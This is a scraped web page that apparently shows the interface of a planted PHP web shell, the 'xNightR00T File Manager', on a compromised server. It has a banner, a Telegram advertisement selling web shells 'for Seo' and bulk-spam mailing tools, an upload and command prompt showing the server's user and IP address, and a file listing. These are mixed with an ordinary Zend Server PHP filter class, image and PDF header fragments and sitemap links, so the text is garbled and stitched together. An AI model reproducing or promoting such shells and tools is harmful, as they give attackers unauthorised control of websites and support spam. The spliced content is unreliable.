xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace ZendServer\Filter;

use ZendServer\Filter\FilterInterface;
use ZendServer\Log\Log;
use Zend\Json\Json;
use Issue\Filter\Filter as IssueFilter,
    JobQueue\Filter\Filter as JobFilter;

class Filter implements FilterInterface
{
    protected $id;
    protected $name;
    protected $type;
    protected $data;
    protected $custom;

    const ISSUE_FILTER_TYPE     = 'issue';
    const JOB_FILTER_TYPE       = 'job';
    const AUDIT_FILTER_TYPE     = 'audit';
    const VHOST_FILTER_TYPE     = 'vhost';
    const JOB_RULES_FILTER_TYPE = 'job-rule';
    const ZRAYS_FILTER_TYPE     = 'zrays';

    static $types = array(self::ISSUE_FILTER_TYPE, self::JOB_FILTER_TYPE, self::AUDIT_FILTER_TYPE, self::VHOST_FILTER_TYPE,
        self::JOB_RULES_FILTER_TYPE, self::ZRAYS_FILTER_TYPE);

    public function __construct($data)
    {
        if (isset($data['id'])) {
            $this->setId($data['id']);
        }
        if (isset($data['name'])) {
            $this->setName($data['name']);
        }
        if (isset($data['data'])) {
            $this->setData($data['data']);
        }
        if (isset($data['filter_type'])) {
            $this->setType($data['filter_type']);
        }
        if (isset($data['custom'])) {
            $this->setCustom($data['custom']);
        }
    }

    /**
     * Get the $custom
     */
    public function getCustom()
    {
        return $this->custom;
    }

    /**
     * @param field_type $custom
     */
    public function setCustom($custom)
    {
        $this->custom = $custom;
    }

    /**
     *
     * @return boolean
     */
    public function isCustom()
    {
        return ($this->getCustom() == 1);
    }

    /**
     * Get the $data
     */
    public function getData()
    {
        return Json::decode($this->data, Json::TYPE_ARRAY);
    }

    /**
     * @param field_type $data
     */
    public function setData($data)
    {
        $this->data = $data;
    }

    /**
     * Get the $id
     */
    public function getId()
    {
        return $this->id;
    }

    /**
     * Get the $name
     */
    public function getName()
    {
        return $this->name;
    }

    /**
     * @param string $name
     */
    public function setName($name)
    {
        $this->name = $name;
    }

    /**
     *
     * @param int $id
     */
    public function setId($id)
    {
        $this->id = $id;
    }

    /**
     * @param string $type
     */
    public function getType()
    {
        return $this->type;
    }

    /**
     *
     * @param string $type
     */
    public function setType($type)
    {
        $this->type = $type;
    }

    public function serialize()
    {
        return Json::encode($this->data);
    }
}

Filemanager

Name Type Size Permission Actions
Controller Folder 0755
View Folder 0755
Factory.php File 553 B 0644
Filter.php File 2.66 KB 0644
FilterInterface.php File 98 B 0644
FilterList.php File 507 B 0644
Mapper.php File 3.42 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml